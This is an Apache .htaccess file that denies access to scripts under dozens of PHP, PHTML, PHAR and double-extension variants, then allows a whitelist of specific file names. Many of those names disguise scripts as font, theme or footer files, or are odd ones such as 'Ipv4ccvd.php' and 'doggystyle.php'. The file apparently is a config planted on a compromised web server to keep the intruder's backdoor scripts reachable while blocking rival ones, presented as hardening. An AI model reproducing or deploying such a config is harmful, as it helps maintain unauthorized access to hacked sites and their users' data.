Options -Indexes

<FilesMatch "\.(?:php|php|Php|pHp|phP|PHp|pHP|PhP|PHP|PhP|php5|Php5|pHp5|phP5|PHp5|pHP5|PhP5|PHP5|PhP5|php6|Php6|pHp6|phP6|PHp6|pHP6|PhP6|PHP6|PhP6|php56|Php56|pHp56|phP56|PHp56|pHP56|PhP56|PHP56|PhP56|php7|Php7|pHp7|phP7|PHp7|pHP7|PhP7|PHP7|PHP7|PhP7|PhP7.|php7.|php8|php8.|php9|php9.|phtml|Phtml|pHtml|phTml|pHTml|Fla|fLa|flA|FLa|fLA|FlA|FLA|phtMl|phtmL|PHtml|PhTml|PHTML|PHTml|PHTMl|PhtMl|PHTml|PHtML|pHTMl|PhTML|pHTML|PhtmL|PHTmL|PhtMl|PhtmL|pHtMl|PhTmL|pHtmL|aspx|ASPX|asp|ASP|php.jpg|PHP.JPG|php.xxxjpg|PHP.XXXJPG|php.jpeg|PHP.JPG|PHP.JPEG|PHP.PJEPG|php.pjpeg|php.fla|PHP.FLA|php.png|PHP.PNG|php.gif|PHP.GIF|php.test|php;.jpg|PHP JPG|PHP;.JPG|php;.jpeg|php jpg|php.bak|php.pdf|php.xxxpdf|php.xxxpng|fla|Fla|fLa|fLa|flA|FLa|fLA|FLA|FlA|php.xxxgif|php.xxxpjpeg|php.xxxjpeg|php3.xxxjpeg|php3.xxxjpg|php5.xxxjpg|php3.pjpeg|php5.pjpeg|shtml|php.unknown|php.doc|php.docx|php.pdf|php.ppdf|jpg.PhP|php.txt|php.xxxtxt|PHP.TXT|PHP.XXXTXT|php.xlsx|php.zip|php.xxxzip|phar|PHAR|Phar|pHar|phAr|phaR|pHAR|PhAR|PHaR|PHAr|PHar|PhAr|PhaR|pHaR|phAR|shtMl|shtmL|SHtml|ShTml|SHTML|SHTml|SHTMl|ShtMl|SHTml|SHtML|sHTMl|ShTML|sHTML|ShtmL|SHTmL|ShtMl|ShtmL|sHtMl|ShTmL|sHtmL|Shtml|sHtml|shTml|sHTml|shtml|anu|Anu|ANu|aNU|aNu|AnU|ANU|perl|Perl|pErl|peRl|perL|PERL|py|exe)$">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "^(upgrades.php|Documentation.php|debug.php|URNPubIdPlugins.php|glyphicons-halflings-regular.php|select2-addl.min.php|fontawesome-webfont.php|Walkway_Bold.php|navigation-menu.php|bottom_menu.php|migrations.php|OAIMetadataFormatPlugins_RFC1807.php|PragmaThemePlugins.inc.php|Dc11Plugins.php|emcialan.php|OJSmentConfiguration.inc.php|RegisterAuth.inc.php|MakeSubmissionBlockPlugins.inc.php|wp-footer.php|ArticlePubMedXmlFilters.php|locale.php|wp-footer.shtml|Ipv4ccvd.php|ArticleGalleyGridHandler.php|Ipv4sxzccvd.shtml|Ipv5ccvd.php|71-1-129-1-2-20250809.phtml|Ipv5.shtml|counters.php|emails.php|ReviewerReviewStep4Form.inc.php|DisapproveSubmissionNotificationManager.inc.php|gecko-MAR.php|20211118232553-17012021028-transkrip-nilai-smp.php|mCampus-v6.php|hero-area.php|shims.php|emcialan.shtml|4142-1-AADHAAR646392.php|conpig.init.php|Documentssation.php|4142-1-AAAR650546392.php|SimpleFont.php|Circle.php|LazyCloseStream.php|InternalUrlException.php|DataController.php|ResetDataForm.php|AuthItemList.php|params-args.php|emcialan.shtml|main-args.shtml|Documentation.shtml|ParaciteCitationsParserPlugin.inc.php|user.php|OJSReviewPaymentDAO.php|OAIMetadataFormatDataset_MARC.php|ManualPayment.php|class-ftp-admin.php|Kasus.php|Cikini.php|config.STYLE.init.php|double.php|doggystyle.php|69style.php|cucukimay.php|transkrip.php|htmloptions.php|index.php)$">
Order allow,deny
Allow from all
</FilesMatch>